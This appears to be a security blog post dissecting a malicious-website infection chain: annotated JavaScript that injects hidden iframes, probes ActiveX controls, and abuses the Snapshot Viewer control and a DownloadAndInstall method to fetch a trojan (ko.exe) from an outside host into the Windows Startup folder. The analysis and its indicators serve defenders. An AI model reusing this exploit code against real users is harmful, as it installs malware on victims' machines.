www.eoai114.cn and user1.jzm010.cn

malicious content here…

Content of index.html
// Blanks the status bar once the page has loaded. Presumably intended to keep the
// URLs of the hidden iframes written below out of the user's view (inferred from
// context; the code itself only clears window.status).
function init(){window.status="";}window.onload = init;
// Run-once gate: the iframe injection below only happens when no "play=" cookie is
// present, and the cookie set here expires after 24 hours, so a victim is hit at
// most once per day. The cookie name "play=" and the zero-height iframes pointing
// at user1.jzm010.cn are the usable indicators for this page.
if(document.cookie.indexOf("play=")==-1)
{
var expires=new Date();
// 24 hours from now.
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie="play=Yes;path=/;expires="+expires.toGMTString();
// Browser selection: Internet Explorer gets ilink.html, anything else flink.html.
// Quirk: the comparison is >0, so a UA string that *starts* with "msie" (index 0)
// would fall through to the non-IE branch.
if(navigator.userAgent.toLowerCase().indexOf("msie")>0)
{
document.write("<Iframe src=http://user1.jzm010.cn/ilink.html width=100 height=0
></iframe>");
}
else{document.write("<Iframe src=http://user1.jzm010.cn/flink.html width=100 hei
ght=0></iframe>");}
}
// Third hidden iframe, NOT gated by the cookie above, pointing at a different host
// (www.dxp008.cn). The escaped slashes ("http:\/\/") are most likely there to
// evade naive signature matching on the literal string "http://".
document.writeln("<Iframe src=http:\/\/www.dxp008.cn\/b2.htm width=50 height=0><
\/iframe>")

Content of aa2.htm?20
<!-- Three zero-height iframes, each loading a separate page from user1.jzm010.cn
     (ac.htm is examined further down in the post). Zero-height iframes whose src
     points at an external host are the primary indicator to alert on here. -->
<Iframe src="http://user1.jzm010.cn/14.htm" width=100 height=0></iframe>
<Iframe src="http://user1.jzm010.cn/fx.htm" width=100 height=0></iframe>
<Iframe src="http://user1.jzm010.cn/ac.htm" width=100 height=0></iframe>
<script>
// Obfuscation only: the decoy name "kaspersky", the random-looking identifiers
// (L_czcY_1, Jy2$2, ...) and bracket-notation access such as
// window["document"]["cookie"] behave exactly like plain dotted access; they exist
// to defeat simple string signatures.
var kaspersky="woyaofa"
var L_czcY_1 = new window["Date"]()
// Cookie lifetime: 3 hours from now.
L_czcY_1["setTime"](L_czcY_1["getTime"]() + 3*60*60*1000)
var Jy2$2 = new window["String"](window["document"]["cookie"])
var sX$bhbGk3 = "Cookie1="
var zecKZZ4 = Jy2$2["indexOf"](sX$bhbGk3)
// Second, independent run-once gate (the "play=" cookie lives in index.html);
// marker value here is "Cookie1=POPWINDOS".
if (zecKZZ4 == -1)
{
window["document"]["cookie"] = "Cookie1=POPWINDOS;expires="+ L_czcY_1["toGMTStri
ng"]()
// Component probing. Each try block instantiates an ActiveX control by ProgID and,
// only if that succeeds, writes a display:none iframe pointing at the matching
// follow-up page; if the control is absent the constructor throws and catch(e){}
// swallows it, so the page never errors visibly.
//   GLIEDown.IEDown.1    -> newlz.htm
//   IERPCtl.IERPCtl.1    -> real11.htm and real10.htm (same control probed twice)
//   GLCHAT.GLChatCtrl.1  -> lz.htm
// Mitigation: a kill-bit or removal of these controls makes every probe throw,
// and no iframe is written.
try{if(new window["ActiveXObject"]("GLIEDown.IEDown.1"))window["document"]["writ
e"]('<iframe style=display:none src="http://user1.jzm010.cn/newlz.htm"></iframe>
');}catch(e){}
try{if(new window["ActiveXObject"]("IERPCtl.IERPCtl.1"))window["document"]["writ
e"]('<iframe style=display:none src="http://user1.jzm010.cn/real11.htm"></iframe
>');}catch(e){}
try{if(new window["ActiveXObject"]("IERPCtl.IERPCtl.1"))window["document"]["writ
e"]('<iframe style=display:none src="http://user1.jzm010.cn/real10.htm"></iframe
>');}catch(e){}
try{if(new window["ActiveXObject"]("GLCHAT.GLChatCtrl.1"))window["document"]["wr
ite"]('<iframe style=display:none src="http://user1.jzm010.cn/lz.htm"></iframe>'
);}catch(e){}
// Assignment to an otherwise unused global; appears to be padding/obfuscation.
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=1;
}
</script>
<!-- Third-party visitor counter (51.la) loaded from an external host. Not an
     exploit in itself, but the numeric account id in the script path is plausibly
     the operator's stats account and is worth recording as a pivot/indicator. -->
<script language="javascript" type="text/javascript" src="http://js.users.51.la/
1812235.js"></script>

Let’s follow one of the links, user1.jzm010.cn/ac.htm

<!-- Instantiates an ActiveX control by CLSID (F0E42D50-368C-11D0-AD81-00A0C90DC8D9);
     the post identifies it as the MS Snapshot Viewer control. -->
<html><object classid="clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9" id="obj"></object>
<script language="javascript">
// buf1: remote executable to fetch. buf2: destination path under the All Users
// profile; the Chinese segments translate to "Start Menu/Programs/Startup", i.e.
// the payload is dropped where it will be launched at the next login.
var buf1 = "http://dddd.nihao69.cn/down/ko.exe";
var buf2 = "C:/Documents and Settings/All Users/「开始」菜单/程序/启动/qq.exe";
// The control's SnapshotPath / CompressedPath properties plus PrintSnapshot() are
// being used as a fetch-and-write-to-disk primitive. Indicators: the ko.exe URL,
// the dddd.nihao69.cn host, and a file named qq.exe appearing in the Startup folder.
obj.SnapshotPath = buf1;obj.CompressedPath = buf2;obj.PrintSnapshot();
</script></html>
<!-- Chains to the next page (ce.htm, examined below) regardless of whether the
     download above succeeded. -->
<Iframe src="http://user1.jzm010.cn/ce.htm" width=100 height=0></iframe>

What’s this? It’s exploiting the MS Snapshot Viewer ActiveX control to download a trojan.

Let’s follow another link, user1.jzm010.cn/ce.htm
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<!-- GENERATOR header: page was saved from MSHTML 6 tooling; a weak attribution hint. -->
<META content="MSHTML 6.00.2900.3354" name=GENERATOR></HEAD>
<BODY>
<!-- Instantiates a control by CLSID 78ABDC59-D8E7-44D3-9A76-9A0918C52B4A; the post
     does not identify which product ships it. Whatever it is, the script relies on
     it exposing a DownloadAndInstall(url) method. -->
<OBJECT id=install classid=clsid:78ABDC59-D8E7-44D3-9A76-9A0918C52B4A></OBJECT>
<SCRIPT>
// Same payload URL as ac.htm (dddd.nihao69.cn/down/ko.exe), so blocking that
// host/URL neutralises both pages at once.
var YEtYcJsR1="http://dddd.nihao69.cn/down/ko.exe";
// Bracket notation again, most likely to keep the method name out of simple
// string signatures.
install["DownloadAndInstall"](YEtYcJsR1);
</SCRIPT>
</BODY></HTML>

What is this CLSID? It could be another new exploit.
